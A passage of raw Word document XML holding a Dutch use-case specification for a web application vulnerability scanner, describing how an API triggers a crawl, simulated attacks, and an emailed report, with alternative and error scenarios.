                          <w:p w14:paraId="2A499688" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De API geeft een scanopdracht aan de Terminal</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="64209773" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De Terminal voert de scanopdracht uit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="515F11E2" w14:textId="287F87DF" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem, de Web Applicatie Scanner start de crawl proces</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="473DF5A6" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Crawler</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> crawlt de website en verzamelt de data</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2F05C662" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Crawler</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> slaat de data op in de database</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0B9878B8" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem start de scan proces</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="735BD985" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De Scanner voert gesimuleerde aanvallen uit op basis van de verzamelde data</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="25B4C9BD" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De Scanner slaat de data van de aanval op in de database</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="23AC2C68" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem genereert een rapport op basis van de opgeslagen data van de Scanner</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1F3055F8" w14:textId="1BAD2E75" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="29"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het Systeem verzendt het rapport naar het emailadres van de klant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1C5EC9D0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00EC41A7">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Alternatieve Scenario</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve">: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="000022DC">
                              <w:t>gebruikt stappen uit Succes Scenario</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> vanaf stap 5</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7B70E54F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="30"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De API geeft een scanopdracht aan de Terminal met Authenticatie optie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="351A031B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="30"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>De Terminal voert de scanopdracht uit</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41F602F1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="30"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem start de crawl proces</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="15DBB31E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="30"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Crawler</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> authentiseert zich om toegang te verkrijgen tot de website</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="28733807" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="30"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Zie stap 5 van Succes Scenario</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="67392BDF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="006A624E">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t xml:space="preserve"> 3.2a: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007B2132">
                              <w:t>gebruik extensie 1.5a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="17550738" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>2a – de opgegeven URL is niet correct</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3402B6D4" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="31"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem stuurt een email naar de klant toe om te vermelden dat de aanvraag mislukt is</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="672CA16E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="31"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem verzoek de klant om het nogmaals te proberen, als het dan nog steeds niet lukt de administrator te contacteren (Telefoonnummer wordt meegegeven)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3639DE91" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Extensie 3</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00453CF9">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>.3a</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>:</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> gebruik extensie 1.5a</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="651C1FD7" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                            <w:r>
                              <w:t>3a – Website is niet gevonden</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02FE59AB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="32"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem stuurt een email naar de klant toe om te vermelden dat de aanvraag mislukt is</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72C2B170" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="32"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Het systeem verzoek de klant om het nogmaals te proberen, als het dan nog steeds niet lukt de administrator te contacteren (Telefoonnummer wordt meegegeven)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="321DF7FF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00453CF9" w:rsidRDefault="00CE4BB5"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F5EAF" id="_x0000_s1125" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-.9pt;margin-top:2.45pt;width:452.25pt;height:696pt;z-index:251871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hivD4CAAByBAAADgAAAGRycy9lMm9Eb2MueG1srFTbbtswDH0fsH8Q9L46SeMlMeoUXbsOA7oL&#10;0O4DaFmOhUqiJymxu68vJadeur0NexFEkT4kzyF9cTkYzQ7SeYW25POzGWfSCqyV3ZX8x8PtuzVn&#10;PoCtQaOVJX+Snl9u37656LtCLrBFXUvHCMT6ou9K3obQFVnmRSsN+DPspCVng85AINPtstpBT+hG&#10;Z4vZ7H3Wo6s7h0J6T683o5NvE37TSBG+NY2XgemSU20hnS6dVTyz7QUUOwddq8SxDPiHKgwoS0kn&#10;qBsIwPZO/QVllHDosQlnAk2GTaOETD1QN/PZH93ct9DJ1AuR47uJJv//YMXXw3fHVF3y5WbFmQVD&#10;Ij3IRx8O8MgWkZ++8wWF3XcUGIYPOJDOqVff3aF49MzidQt2J6+cw76VUFN98/hldvLpiOMjSNV/&#10;wZrSwD5gAhoaZyJ5RAcjdNLpadJGDoEJesxXy/N8lXMmyLden29I/ZQDipfPO+fDJ4mGxUvJHYmf&#10;4OFw50MsB4qXkJjNo1b1rdI6GXHg5LV27AA0KtVubFHvDdU6vm3y2ZQyzWcMT6ivkLRlfck3+SIf&#10;SXqVxe2qKQehnQCehhkVaCm0MtTpFARFpPajrdPIBlB6vFNX2h65jvSORIehGpKsm0nDCusnYt/h&#10;uAS0tHRp0f3irKcFKLn/uQcnOdOfLSm4mS+XcWOSscxXCzLcqac69YAVBFXywNl4vQ5pyyK3Fq9I&#10;6UYlDeJIjJUca6bBTiQelzBuzqmdon7/KrbPAAAA//8DAFBLAwQUAAYACAAAACEATYevZ94AAAAJ&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7VI3FqnBQUc4lQIxKUSQm3hwM2Jt0lE&#10;vI5spw1/z3KC42hGM2/KzewGccIQe08aVssMBFLjbU+thvfDy+IeREyGrBk8oYZvjLCpLi9KU1h/&#10;ph2e9qkVXEKxMBq6lMZCyth06Exc+hGJvaMPziSWoZU2mDOXu0GusyyXzvTEC50Z8anD5ms/OQ3u&#10;tabtJ229tdMhPKf87QPVUevrq/nxAUTCOf2F4Ref0aFiptpPZKMYNCxWTJ403CoQbKtsfQei5tyN&#10;yhXIqpT/H1Q/AAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAA&#10;AAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFFYYrw+AgAAcgQAAA4AAAAA&#10;AAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAE2Hr2feAAAACQEAAA8A&#10;AAAAAAAAAAAAAAAAlgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAChBQAAAAA=&#10;" fillcolor="#f2f2f2 [3052]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4ABFD196" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>UC-3</w:t>
                      </w:r>
                      <w:r w:rsidRPr="003B4D3F">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>: Voert scan opdracht uit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3BD856E9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>De API geeft de opdracht aan de Terminal om een scan opdracht uit te voeren op verzoek van de klant.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="758B064D" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00CF63E0" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Acteur</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="717DBA1F" w14:textId="06A890EA" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>API</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7F5A24BA" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00817940">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Preconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4040024F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="27"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De klant heeft een aanvraag gedaan voor een scan</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="72A56B96" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="27"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De aanvraag is goedgekeurd door het systeem</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="4F1D3FFE" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="004C5131" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004C5131">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Postconditie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="302CDFB2" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="28"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De scan is succesvol uitgevoerd. Er is een rapport gegenereerd, deze is succesvol verzonden naar de klant toe</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="448E8322" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00637DFA" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00637DFA">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Succes Scenario</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A499688" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De API geeft een scanopdracht aan de Terminal</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="64209773" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De Terminal voert de scanopdracht uit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="515F11E2" w14:textId="287F87DF" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem, de Web Applicatie Scanner start de crawl proces</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="473DF5A6" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Crawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> crawlt de website en verzamelt de data</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2F05C662" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Crawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> slaat de data op in de database</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0B9878B8" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem start de scan proces</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="735BD985" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De Scanner voert gesimuleerde aanvallen uit op basis van de verzamelde data</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="25B4C9BD" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De Scanner slaat de data van de aanval op in de database</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="23AC2C68" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem genereert een rapport op basis van de opgeslagen data van de Scanner</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1F3055F8" w14:textId="1BAD2E75" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="29"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het Systeem verzendt het rapport naar het emailadres van de klant</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1C5EC9D0" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00EC41A7">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Alternatieve Scenario</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="000022DC">
                        <w:t>gebruikt stappen uit Succes Scenario</w:t>
                      </w:r>
                      <w:r>
                        <w:t xml:space="preserve"> vanaf stap 5</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7B70E54F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="30"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De API geeft een scanopdracht aan de Terminal met Authenticatie optie</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="351A031B" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="30"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>De Terminal voert de scanopdracht uit</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="41F602F1" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="30"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem start de crawl proces</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="15DBB31E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="30"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">De </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Crawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> authentiseert zich om toegang te verkrijgen tot de website</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="28733807" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="30"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Zie stap 5 van Succes Scenario</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="67392BDF" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:pPr>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="006A624E">
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t>Extensie</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:b/>
                        </w:rPr>
                        <w:t xml:space="preserve"> 3.2a: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007B2132">
                        <w:t>gebruik extensie 1.5a</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="17550738" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="0061509C">
                      <w:r>
                        <w:t>2a – de opgegeven URL is niet correct</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3402B6D4" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00895A0E">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="31"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Het systeem stuurt een email naar de klant toe om te vermelden dat de aanvraag mislukt is</w:t>
                      </w:r>
                    </w:p>
